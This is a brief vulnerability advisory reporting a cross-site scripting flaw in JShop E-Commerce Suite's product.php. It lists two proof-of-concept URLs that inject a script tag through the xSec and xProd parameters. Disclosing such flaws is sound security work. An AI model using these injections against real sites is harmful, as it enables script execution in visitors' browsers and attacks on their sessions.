JShop E-Commerce Suite Product.PHP Cross-Site Scripting Vulnerability

JShop E-Commerce Suite Product.PHP Cross-Site Scripting Vulnerability

No exploit is required.

The following proof of concepts were provided:
product.php?xSec=1&xProd=7"><script>alert(document.domain);</script>

product.php?xSec=1"><script>alert(document.domain);</script>&xProd=7